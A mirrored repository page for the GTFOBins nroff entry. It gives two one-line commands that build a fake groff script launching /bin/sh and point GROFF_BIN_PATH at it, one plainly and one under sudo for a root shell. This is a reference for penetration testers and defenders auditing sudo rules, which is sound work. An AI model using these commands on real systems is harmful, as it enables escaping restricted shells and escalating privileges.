This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 09:21:34 +01:00
Code
Issues
c9f5c065c0
GTFOBins.github.io
/
_gtfobins
/
nroff.md
Andrea Cardaci
9aa7ec842e
Use the sudo VAR=... syntax instead of using -E
2020-06-10 22:56:05 +02:00
383 B
Raw
Blame
History
functions
shell
sudo
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff GROFF_BIN_PATH=$TF nroff
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff sudo GROFF_BIN_PATH=$TF nroff